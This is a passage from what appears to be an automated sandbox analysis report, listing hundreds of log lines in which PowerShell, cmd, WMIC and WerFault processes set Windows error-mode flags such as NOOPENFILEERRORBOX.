Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
